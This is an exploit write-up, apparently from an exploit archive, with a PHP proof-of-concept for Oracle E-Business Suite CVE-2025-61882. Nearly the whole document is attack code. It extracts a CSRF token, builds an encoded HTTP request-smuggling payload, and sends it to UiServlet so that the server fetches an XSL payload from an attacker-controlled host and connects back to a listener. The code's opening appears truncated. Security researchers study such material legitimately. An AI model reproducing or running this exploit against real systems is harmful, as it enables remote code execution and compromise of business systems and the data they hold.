============================================================================================================================================= | # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.oracle.com/applications/ebusiness/ | ============================================================================================================================================= [+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882 [+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882. It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization. The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body. Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure. The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research. [+] POC : php poc.php target = $options['target'] ?? null; $this->lhost = $options['lhost'] ?? null; $this->lport = $options['lport'] ?? null; $this->srvHost = $options['srvHost'] ?? '127.0.0.1'; $this->srvPort = $options['srvPort'] ?? 8080; $this->verbose = $options['verbose'] ?? false; if ($this->target) { $parsed = parse_url($this->target); if ($parsed !== false) { $scheme = $parsed['scheme'] ?? 'http'; $this->useHttps = ($scheme === 'https'); $this->target = $parsed['host'] ?? $this->target; $this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80); } } } private function retrieveCsrfTokenImproved() { $url = $this->buildUrl('/OA_HTML/JavaScriptServlet'); $headers = [ 'CSRF-XHR: YES', 'FETCH-CSRF-TOKEN: 1', 'X-Requested-With: XMLHttpRequest' ]; $response = $this->httpRequest('POST', $url, '', $headers, true); if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) { return trim($m[1]); } if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) { return $m[1]; } return false; } private function createSmugglePayloadImproved($xslUrl) { $parsedXsl = parse_url($xslUrl); $xslHost = $parsedXsl['host'] ?? $this->srvHost; $xslPath = $parsedXsl['path'] ?? '/payload.xsl'; $smuggled = "GET {$xslPath} HTTP/1.1\r\n"; $smuggled .= "Host: {$xslHost}\r\n"; $smuggled .= "User-Agent: Oracle-Internal/1.0\r\n"; $smuggled .= "Connection: keep-alive\r\n\r\n"; $payload = "0\r\n\r\n"; $payload .= $smuggled; return $this->encodeSmugglePayload($payload); } private function encodeSmugglePayload($payload) { $encoded = ''; $len = strlen($payload); for ($i = 0; $i < $len; $i++) { $c = $payload[$i]; if ($c === "\r" || $c === "\n") { $encoded .= $c; } else { $encoded .= '&#' . ord($c) . ';'; } } return $encoded; } public function exploit() { $this->log("Attempting to retrieve CSRF token...", "info"); $token = $this->retrieveCsrfTokenImproved(); if (!$token) { $this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning"); } $xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl"; $smuggleData = $this->createSmugglePayloadImproved($xslUrl); $xml = ""; $xml .= ""; $xml .= "http://internal.ebs.local{$smuggleData}"; $xml .= "Applet"; $xml .= ""; $url = $this->buildUrl('/OA_HTML/configurator/UiServlet'); $postData = http_build_query([ 'redirectFromJsp' => '1', 'getUiType' => $xml, 'oa_csrf_token' => $token ]); $this->log("Sending smuggling payload to UiServlet...", "info"); $this->httpRequest('POST', $url, $postData, [ 'Content-Type: application/x-www-form-urlencoded' ]); $this->log("Payload sent. Monitor your HTTP server and listener.", "success"); } private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_CUSTOMREQUEST => $method, CURLOPT_HEADER => $returnFull, CURLOPT_HTTPHEADER => array_merge( ["User-Agent: {$this->userAgent}"], $headers ) ]); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); curl_close($ch); return $response; } private function buildUrl($path) { $scheme = $this->useHttps ? 'https' : 'http'; return "{$scheme}://{$this->target}:{$this->targetPort}{$path}"; } private function log($msg, $type) { echo "[{$type}] {$msg}\n"; } } $options = [ 'target' => 'http://192.168.1.100:8000', 'lhost' => '192.168.1.50', 'lport' => 4444, 'srvHost' => '192.168.1.50', 'srvPort' => 8080 ]; $exploit = new OracleEBSCVE202561882Exploit($options); $exploit->exploit(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================